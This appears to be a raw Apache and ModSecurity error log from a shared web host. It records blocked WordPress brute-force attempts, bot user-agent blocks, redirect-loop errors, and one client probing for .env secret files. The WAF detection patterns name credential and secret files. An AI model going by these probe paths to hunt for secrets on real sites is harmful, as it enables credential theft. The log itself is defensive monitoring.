[Tue May 26 14:19:21.288552 2026] [security2:error] [pid 598542:tid 598769] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVekP4iWyZxnXeAW3JoBQAAAGE"]
[Tue May 26 14:19:22.194877 2026] [security2:error] [pid 598542:tid 598759] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVekf4iWyZxnXeAW3JoJQAAAFc"]
[Tue May 26 14:19:24.023512 2026] [security2:error] [pid 598542:tid 598760] [client 123.26.156.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVek_4iWyZxnXeAW3JoVQAAAFg"]
[Tue May 26 14:19:26.639611 2026] [security2:error] [pid 598542:tid 598688] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVelv4iWyZxnXeAW3JoogAAABA"]
[Tue May 26 14:19:26.717140 2026] [security2:error] [pid 598542:tid 598707] [client 202.141.30.10:35487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVelv4iWyZxnXeAW3JorgAAACM"]
[Tue May 26 14:19:26.717326 2026] [security2:error] [pid 598542:tid 598707] [client 202.141.30.10:35487] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVelv4iWyZxnXeAW3JorgAAACM"]
[Tue May 26 14:19:28.724128 2026] [security2:error] [pid 598542:tid 598772] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVemP4iWyZxnXeAW3Jo6QAAAGQ"]
[Tue May 26 14:19:30.709712 2026] [security2:error] [pid 598542:tid 598747] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVemv4iWyZxnXeAW3JpGQAAAEs"]
[Tue May 26 14:19:31.138965 2026] [security2:error] [pid 598542:tid 598644] [remote 111.229.141.137:43790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVem_4iWyZxnXeAW3JpLwAAcmU"]
[Tue May 26 14:19:31.488529 2026] [security2:error] [pid 598542:tid 598731] [client 202.141.83.254:19924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVem_4iWyZxnXeAW3JpPAAAADs"]
[Tue May 26 14:19:31.488669 2026] [security2:error] [pid 598542:tid 598731] [client 202.141.83.254:19924] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVem_4iWyZxnXeAW3JpPAAAADs"]
[Tue May 26 14:19:33.112642 2026] [security2:error] [pid 598542:tid 598683] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVenP4iWyZxnXeAW3JpbQAAAAs"]
[Tue May 26 14:19:33.698613 2026] [security2:error] [pid 598542:tid 598765] [client 74.7.230.33:57872] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVenf4iWyZxnXeAW3JpiAAAXXo"]
[Tue May 26 14:19:34.866972 2026] [security2:error] [pid 598542:tid 598675] [client 114.119.150.168:59473] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVenv4iWyZxnXeAW3JprQAAAAM"], referer: http://glorodavionics.com/index.php?route=product%2Fmanufacturer%2Finfo&manufacturer_id=11
[Tue May 26 14:19:35.132505 2026] [security2:error] [pid 598542:tid 598771] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVenv4iWyZxnXeAW3JpqAAAAGM"]
[Tue May 26 14:19:35.886396 2026] [ssl:error] [pid 598542:tid 598764] [client 98.88.137.2:31495] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpanel.consola.jhonweb.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:19:36.254785 2026] [security2:error] [pid 598542:tid 598670] [remote 51.91.98.45:41670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVeoP4iWyZxnXeAW3Jp1wAAAn8"]
[Tue May 26 14:19:37.104385 2026] [security2:error] [pid 598542:tid 598774] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeoP4iWyZxnXeAW3Jp6gAAAGY"]
[Tue May 26 14:19:37.415250 2026] [security2:error] [pid 598542:tid 598691] [client 202.141.30.10:65498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeof4iWyZxnXeAW3Jp_wAAABM"]
[Tue May 26 14:19:37.415891 2026] [security2:error] [pid 598542:tid 598691] [client 202.141.30.10:65498] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeof4iWyZxnXeAW3Jp_wAAABM"]
[Tue May 26 14:19:39.578098 2026] [security2:error] [pid 598542:tid 598675] [client 68.183.190.139:56296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVeo_4iWyZxnXeAW3JqNAAAAAM"]
[Tue May 26 14:19:39.772823 2026] [security2:error] [pid 598542:tid 598775] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeo_4iWyZxnXeAW3JqMwAAAGc"]
[Tue May 26 14:19:40.212319 2026] [security2:error] [pid 598542:tid 598738] [client 68.183.190.139:56358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/wp-login.php"] [unique_id "ahVepP4iWyZxnXeAW3JqRQAAAEI"]
[Tue May 26 14:19:41.552745 2026] [security2:error] [pid 598542:tid 598761] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVepf4iWyZxnXeAW3JqVAAAAFk"]
[Tue May 26 14:19:42.054864 2026] [security2:error] [pid 598542:tid 598762] [client 202.141.83.254:19939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVepf4iWyZxnXeAW3JqaQAAAFo"]
[Tue May 26 14:19:42.055122 2026] [security2:error] [pid 598542:tid 598762] [client 202.141.83.254:19939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVepf4iWyZxnXeAW3JqaQAAAFo"]
[Tue May 26 14:19:43.553958 2026] [security2:error] [pid 598542:tid 598790] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVep_4iWyZxnXeAW3JqjwAAAHY"]
[Tue May 26 14:19:43.713854 2026] [security2:error] [pid 598542:tid 598745] [client 85.208.96.202:22192] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVep_4iWyZxnXeAW3JqogAAAEk"]
[Tue May 26 14:19:43.713950 2026] [security2:error] [pid 598542:tid 598745] [client 85.208.96.202:22192] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVep_4iWyZxnXeAW3JqogAAAEk"]
[Tue May 26 14:19:44.093664 2026] [security2:error] [pid 598542:tid 598771] [client 42.116.13.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVep_4iWyZxnXeAW3JqnwAAAGM"]
[Tue May 26 14:19:45.654670 2026] [security2:error] [pid 598542:tid 598704] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeqf4iWyZxnXeAW3Jq0QAAACA"]
[Tue May 26 14:19:45.749630 2026] [security2:error] [pid 598542:tid 598798] [client 114.119.157.158:29213] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/ingredients-important-for-a-great-content-mix"] [unique_id "ahVeqf4iWyZxnXeAW3Jq3gAAAH4"], referer: http://moes-art.com/blog
[Tue May 26 14:19:47.514685 2026] [security2:error] [pid 598542:tid 598658] [remote 84.247.181.196:43496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVeq_4iWyZxnXeAW3JrCgAAR3M"]
[Tue May 26 14:19:48.021396 2026] [security2:error] [pid 598542:tid 598722] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeq_4iWyZxnXeAW3JrGAAAADI"]
[Tue May 26 14:19:48.434338 2026] [security2:error] [pid 598542:tid 598716] [client 202.141.30.10:65449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVerP4iWyZxnXeAW3JrLQAAACw"]
[Tue May 26 14:19:48.434436 2026] [security2:error] [pid 598542:tid 598716] [client 202.141.30.10:65449] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVerP4iWyZxnXeAW3JrLQAAACw"]
[Tue May 26 14:19:48.946205 2026] [http2:info] [pid 606909:tid 606909] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:19:49.880431 2026] [security2:error] [pid 606909:tid 607068] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVerV0yRtX9qA7aVUVG3wAAAKI"]
[Tue May 26 14:19:52.001883 2026] [security2:error] [pid 606909:tid 607156] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVer10yRtX9qA7aVUVHFAAAAPo"]
[Tue May 26 14:19:52.284804 2026] [security2:error] [pid 606909:tid 607159] [client 202.141.83.254:19898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVesF0yRtX9qA7aVUVHIQAAAP0"]
[Tue May 26 14:19:52.284931 2026] [security2:error] [pid 606909:tid 607159] [client 202.141.83.254:19898] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVesF0yRtX9qA7aVUVHIQAAAP0"]
[Tue May 26 14:19:52.389810 2026] [security2:error] [pid 606909:tid 607048] [client 2a01:4f8:1c1c:7039::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVer10yRtX9qA7aVUVHGgAAjmI"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 14:19:53.473696 2026] [security2:error] [pid 606909:tid 607130] [client 154.161.32.97:46513] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVer10yRtX9qA7aVUVHFQAAAOA"]
[Tue May 26 14:19:53.484293 2026] [security2:error] [pid 606909:tid 607099] [client 114.119.134.127:53883] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/investor-centre-reports/"] [unique_id "ahVesV0yRtX9qA7aVUVHUQAAAME"], referer: https://panda-eco.com/
[Tue May 26 14:19:54.139519 2026] [security2:error] [pid 606909:tid 607115] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVesV0yRtX9qA7aVUVHVwAAANE"]
[Tue May 26 14:19:56.240811 2026] [security2:error] [pid 606909:tid 607107] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVes10yRtX9qA7aVUVHkAAAAMk"]
[Tue May 26 14:19:57.357770 2026] [proxy:error] [pid 606909:tid 607048] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:19:57.357817 2026] [proxy_http:error] [pid 606909:tid 607048] [client 5.255.121.146:5028] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:19:57.358377 2026] [proxy:error] [pid 606909:tid 607048] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:19:57.358407 2026] [proxy_http:error] [pid 606909:tid 607048] [client 5.255.121.146:5028] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:19:57.422568 2026] [core:error] [pid 606909:tid 607052] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:57.422588 2026] [core:error] [pid 606909:tid 607052] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.292833 2026] [core:error] [pid 606909:tid 607067] [client 5.255.121.146:34010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.292856 2026] [core:error] [pid 606909:tid 607067] [client 5.255.121.146:34010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.309461 2026] [core:error] [pid 606909:tid 607078] [client 5.255.121.146:34052] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.309480 2026] [core:error] [pid 606909:tid 607078] [client 5.255.121.146:34052] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.315186 2026] [security2:error] [pid 606909:tid 607130] [client 5.255.121.146:33970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVetl0yRtX9qA7aVUVHzQAAAOA"]
[Tue May 26 14:19:58.317245 2026] [core:error] [pid 606909:tid 607069] [client 5.255.121.146:34002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.317258 2026] [core:error] [pid 606909:tid 607069] [client 5.255.121.146:34002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.317258 2026] [core:error] [pid 606909:tid 607117] [client 5.255.121.146:34090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.317288 2026] [core:error] [pid 606909:tid 607117] [client 5.255.121.146:34090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.317366 2026] [core:error] [pid 606909:tid 607092] [client 5.255.121.146:34156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.317382 2026] [core:error] [pid 606909:tid 607092] [client 5.255.121.146:34156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.324100 2026] [core:error] [pid 606909:tid 607124] [client 5.255.121.146:34196] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.324114 2026] [core:error] [pid 606909:tid 607124] [client 5.255.121.146:34196] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.325957 2026] [security2:error] [pid 606909:tid 607103] [client 5.255.121.146:33976] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVetl0yRtX9qA7aVUVH1AAAAMU"]
[Tue May 26 14:19:58.326193 2026] [core:error] [pid 606909:tid 607090] [client 5.255.121.146:34206] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.326208 2026] [core:error] [pid 606909:tid 607090] [client 5.255.121.146:34206] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.327328 2026] [core:error] [pid 606909:tid 607093] [client 5.255.121.146:34074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.327344 2026] [core:error] [pid 606909:tid 607093] [client 5.255.121.146:34074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.327894 2026] [core:error] [pid 606909:tid 607105] [client 5.255.121.146:34060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.327906 2026] [core:error] [pid 606909:tid 607105] [client 5.255.121.146:34060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.329640 2026] [core:error] [pid 606909:tid 607081] [client 5.255.121.146:34096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.329656 2026] [core:error] [pid 606909:tid 607081] [client 5.255.121.146:34096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.329910 2026] [core:error] [pid 606909:tid 607082] [client 5.255.121.146:34180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.329917 2026] [core:error] [pid 606909:tid 607082] [client 5.255.121.146:34180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
